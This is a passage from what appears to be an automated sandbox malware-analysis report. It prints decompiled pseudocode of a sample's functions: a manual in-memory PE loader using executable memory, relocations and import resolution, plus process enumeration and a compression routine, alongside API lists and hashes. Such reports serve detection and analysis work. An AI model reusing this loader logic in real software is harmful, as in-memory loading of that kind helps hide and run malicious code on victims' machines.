					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x00e81f47
0x00e81f4a
0x00e81f4f
0x00e82105
0x00e8210b
0x00e81f63
0x00e81f67
0x00e81f69
0x00e81f72
0x00e82103
0x00000000
0x00e81f87
0x00e81f98
0x00e81f9c
0x00e81fa7
0x00e81fb1
0x00e81fb4
0x00e81fba
0x00e81fc3
0x00e81fc6
0x00e81fcb
0x00e81fd0
0x00e81fd0
0x00e81fd9
0x00e81fe7
0x00e81fed
0x00e81ff0
0x00e81ff3
0x00e81ff8
0x00e81ff8
0x00e82006
0x00e82008
0x00e82011
0x00e82013
0x00e82018
0x00e82020
0x00e82023
0x00e82026
0x00e82028
0x00e8202b
0x00e82030
0x00e82032
0x00e82032
0x00e82042
0x00e82049
0x00e8204e
0x00e8204e
0x00e82051
0x00e82054
0x00e82058
0x00e82058
0x00e8205b
0x00e8205d
0x00e82062
0x00e82062
0x00e82065
0x00e8206d
0x00e82080
0x00e82083
0x00e82086
0x00e8208b
0x00e82090
0x00e82099
0x00e8209b
0x00e820a0
0x00000000
0x00000000
0x00e820a7
0x00e820a9
0x00e820ab
0x00e820ad
0x00e820af
0x00e820da
0x00e820dd
0x00e820e0
0x00e820e3
0x00e820e8
0x00000000
0x00e820ea
0x00e820f2
0x00e820f2
0x00e820b1
0x00000000
0x00e820b1
0x00e820b1
0x00e820bb
0x00e820b3
0x00e820b3
0x00e820b3
0x00e820bf
0x00e820c7
0x00000000
0x00000000
0x00e820c9
0x00e820cc
0x00e820cf
0x00e820d1
0x00e820d4
0x00e820d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00e820d8
0x00000000
0x00e820af
0x00e820fb
0x00e82101
0x00e82101
0x00e8208b
0x00e8206d
0x00000000
0x00e81f9c
0x00e81f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,00E88A23,?,000DBBA0), ref: 00E81F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,00E88F82), ref: 00E81FA7
memcpy.NTDLL(?,?,?), ref: 00E81FE7
LoadLibraryA.KERNEL32(00E88F82), ref: 00E82093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00E820BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00E820FB

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: c0a89923a2029497d583524babb95044192aaa856c5c7e75e9118388fa71ff15
Instruction ID: 00bd09b8e93567aa70064e21e6d8f8a011171a43138dcdab6e918f43d85d1bb7
Opcode Fuzzy Hash: c0a89923a2029497d583524babb95044192aaa856c5c7e75e9118388fa71ff15
Instruction Fuzzy Hash: 57518972A002159FCB20DF59C884B6AB3F5FF44308B28446DEA4EEB241E772ED55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00E82110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E82110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E00E88B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x00e8211f
0x00e82121
0x00e82127
0x00e8212c
0x00e8212e
0x00e82134
0x00e82140
0x00e82148
0x00e82173
0x00000000
0x00e82174
0x00e82150
0x00e8215d
0x00000000
0x00e82150
0x00e8217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E82121
Process32FirstW.KERNEL32(00000000,?), ref: 00E82140
CloseHandle.KERNEL32(00000000,?,?), ref: 00E82174

Part of subcall function 00E88B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00E8215D,0000022C,00000000,?,?), ref: 00E88B47
Part of subcall function 00E88B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00E8215D,0000022C,00000000,?,?), ref: 00E88B75
Part of subcall function 00E88B30: RtlAllocateHeap.NTDLL(00000000,?,00E8215D), ref: 00E88B7C
Part of subcall function 00E88B30: lstrcpyW.KERNEL32(00000004,?), ref: 00E88B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 00E82169

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: 2013ce35eb45eef151e6dd53ee976af74ac10eb351ca7673d72486bb20a47446
Instruction ID: e444d61be0e659f68a5d0126ab5c6e88278aa574e6dbe7bf2891dfdb1950c252
Opcode Fuzzy Hash: 2013ce35eb45eef151e6dd53ee976af74ac10eb351ca7673d72486bb20a47446
Instruction Fuzzy Hash: C6F04F355021146EDB20AAB6BC4CBAE76ACAB4A754F2441A5EE0CF2181E73099098BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E86E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00E86E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E00E86A80(_t415);
					} else {
						E00E85B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E00E86C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E00E86A80(_t415);
							_t416 = _t416 + 4;
							E00E86C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x00e86e70
0x00e86e78
0x00e86e7a
0x00e86e7e
0x00e86e8c
0x00e86ea0
0x00e86ea0
0x00e86e8e
0x00e86e94
0x00e86e9e
0x00000000
0x00000000
0x00e86e9e
0x00e86eaa
0x00e86ec7
0x00e86ec7
0x00e86eac
0x00e86eaf
0x00e86ebe
0x00000000
0x00e86ec0
0x00e86ec3
0x00e86ec3
0x00e86ebe
0x00e86ed0
0x00e86ed3
0x00e86edb
0x00e86ee1
0x00e86ee8
0x00e86eef
0x00e86efa
0x00e86f04
0x00e86f0c
0x00e86f16
0x00e86f19
0x00e86f1c
0x00e86f22
0x00e86f24
0x00e86f24
0x00e86f2a
0x00e86f2f
0x00e86f31
0x00e86f31
0x00e86f34
0x00e86f38
0x00e86f3c
0x00e86f24
0x00e86f42
0x00e86f4c
0x00e86f4f
0x00e86f4f
0x00e86f52
0x00e86f58
0x00e86f60
0x00e86f60
0x00e86f66
0x00e86f6b
0x00e86f6d
0x00e86f6d
0x00e86f70
0x00e86f74
0x00e86f78
0x00e86f60
0x00e86f58
0x00e86f7e
0x00e86f8b
0x00e86f8e
0x00e86f8e
0x00e86f91
0x00e86f97
0x00e86fa0
0x00e86fa0
0x00e86fa6
0x00e86fab
0x00e86fad
0x00e86fad
0x00e86fb0
0x00e86fb4
0x00e86fb8
0x00e86fa0
0x00e86fc2
0x00e86fc5
0x00e86fc8
0x00e86fcb
0x00e86fce
0x00e87016
0x00e8701f
0x00e8712b
0x00000000
0x00e87025
0x00e87027
0x00e87030
0x00e87033
0x00e87036
0x00e8703c
0x00e87040
0x00e87040
0x00e87046
0x00e8704b
0x00e8704d
0x00e8704d
0x00e87050
0x00e87054
0x00e87058
0x00e87040
0x00e8705e
0x00e87063
0x00e87067
0x00e87070
0x00e87073
0x00e87073
0x00e87079
0x00e8707e
0x00e87080
0x00e87080
0x00e87083
0x00e87087
0x00e8708b
0x00e87073
0x00e87091
0x00e87096
0x00e87096
0x00e8709f
0x00e870a2
0x00e870a2
0x00e870a5
0x00e870ab
0x00e870b0
0x00e870b0
0x00e870b6
0x00e870bb
0x00e870bd
0x00e870bd
0x00e870c0
0x00e870c4
0x00e870c8
0x00e870b0
0x00e870ce
0x00e870d5
0x00e870d5
0x00e870db
0x00e870e0
0x00e870e3
0x00e870f7
0x00e870fa
0x00e870fa
0x00e870fd
0x00e87103
0x00e87105
0x00e87105
0x00e8710b
0x00e87110
0x00e87112
0x00e87112
0x00e87115
0x00e87119
0x00e8711d
0x00e87105
0x00e87123
0x00e87124
0x00e87129
0x00e870db
0x00e86fd0
0x00e86fd7
0x00e86fe8
0x00e86fdf
0x00e86fe0
0x00e86fe0
0x00e86fed
0x00e86ff2
0x00e86ff7
0x00e86ffa
0x00e86fff
0x00e8712e
0x00e87130
0x00e87136
0x00e87139
0x00e8713c
0x00e8713f
0x00e87144
0x00e87149
0x00e87149
0x00e87013
0x00e87013
0x00000000
0x00e87013
0x00e86fff
0x00e8714e
0x00e87153
0x00e87159
0x00e8715f
0x00e871f3
0x00e871f7
0x00e871fa
0x00e871fd
0x00e87203
0x00e87205
0x00e87205
0x00e8720b
0x00e87210
0x00e87212
0x00e87212
0x00e87215
0x00e87219
0x00e8721d
0x00e87205
0x00e87223
0x00e87228
0x00e8722c
0x00e87235
0x00e87238
0x00e87238
0x00e8723e
0x00e87243
0x00e87245
0x00e87245
0x00e87248
0x00e8724c
0x00e87250
0x00e87238
0x00e87256
0x00e87260
0x00e87260
0x00e87268
0x00e8726b
0x00e8726b
0x00e8726e
0x00e87274
0x00e87276
0x00e87276
0x00e8727c
0x00e87281
0x00e87283
0x00e87283
0x00e87286
0x00e8728a
0x00e8728e
0x00e87276
0x00e87294
0x00e8729a
0x00e8729a
0x00e87165
0x00e87167
0x00e8716b
0x00e87174
0x00e87177
0x00e87177
0x00e8717d
0x00e87182
0x00e87184
0x00e87184
0x00e87187
0x00e8718b
0x00e8718f
0x00e87177
0x00e8719c
0x00e871a2
0x00e871a5
0x00e871b0
0x00e871b0
0x00e871ba
0x00e871bd
0x00e871bd
0x00e871c0
0x00e871c6
0x00e871c8
0x00e871c8
0x00e871ce
0x00e871d3
0x00e871d5
0x00e871d5
0x00e871d8
0x00e871dc
0x00e871e0
0x00e871c8
0x00e871e6
0x00e871e9
0x00e871e9
0x00e871ec
0x00e8719c
0x00e8715f
0x00e872ab
0x00e872bc
0x00e872cb
0x00e872d1
0x00e872da
0x00e872e0
0x00e872e3
0x00e872e6
0x00e872ed
0x00e872f4
0x00e872f6
0x00e87382
0x00e8738b
0x00e872fc
0x00e872ff
0x00e87336
0x00e8733e
0x00e8737c
0x00000000
0x00e87340
0x00e87343
0x00e87352
0x00e8735a
0x00e87360
0x00e87369
0x00e8736b
0x00000000
0x00e8736d
0x00e8736d
0x00e87373
0x00e8737b
0x00e8737b
0x00e8736b
0x00e87301
0x00e8730d
0x00e8731c
0x00e87323
0x00000000
0x00e87326
0x00e87326
0x00e87335
